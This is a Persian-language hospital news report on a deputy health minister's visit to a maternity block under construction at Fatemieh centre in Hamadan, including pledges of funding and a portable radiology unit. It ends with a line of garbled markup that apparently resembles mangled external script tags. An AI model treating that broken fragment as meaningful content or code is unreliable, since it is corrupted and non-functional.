بازدید معاون وزیر بهداشت از بلوک زایمانی فاطمیه

معاون درمان وزارت بهداشت به همراه هیئت همراه از پروژه بلوک زایمانی در حال ساخت مرکز فاطمیه بازدید کرد.

به گزارش روابط عمومی مرکز فاطمیه دکتر جان بابایی معاون درمان وزیر بهداشت، درمان و آموزش پزشکی به همراه دکترموسوی بهار، رییس دانشگاه علوم پزشکی همدان، دکتر جلیلی معاون دانشگاه علوم پزشکی همدان، مهندس رحیمی، معاون توسعه و هیئت همراه از مرکز آموزشی درمانی پژوهشی فاطمیه بازدید به عمل آوردند.

در این بازدید وی از نزدیک در جریان روند پروژه ۴ طبقه (اورژانس، زایمان، ناباروری و نوزادان ) در متراژ ۵۰۰۰ متر قرار گرفت و در این خصوص اطلاعاتی از سوی مسئولین ارائه شد.

دکتر جان بابایی از مهم ترین برنامه های وزارت بهداشت را توسعه و تکمیل زیر ساخت های مراکز درمانی دانسته و قول تامین اعتبار پروژه و تجهیزات مورد نیاز برای راه اندازی ساختمان را به مسئولین داد.

در ادامه بازدید از بخش مراقبت های ویژه نوزادان بازدید شد که توضیحاتی مبنی بر اقدامات درمانی و بالینی و تخصصی و فوق تخصصی که در این بخش صورت می گیرد توسط دکتر شکوهی، فوق تخصص نوزادان داده شد.

معاون درمان وزارت بهداشت قول تامین یک دستگاه رادیولوژی پرتابل جهت بخش مراقبت های ویژه نوزادان را اعلام کرد.

دکتر علیمحمدی، رییس مرکز نیز ضمن تقدیر و تشکر از دکتر جان بابایی، اهداف تعیین شده و چشم انداز پیش رو این مرکز را مطرح و خواستار نگاه ویژه مسئولین به بیمارستان جامعه زنان شد.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>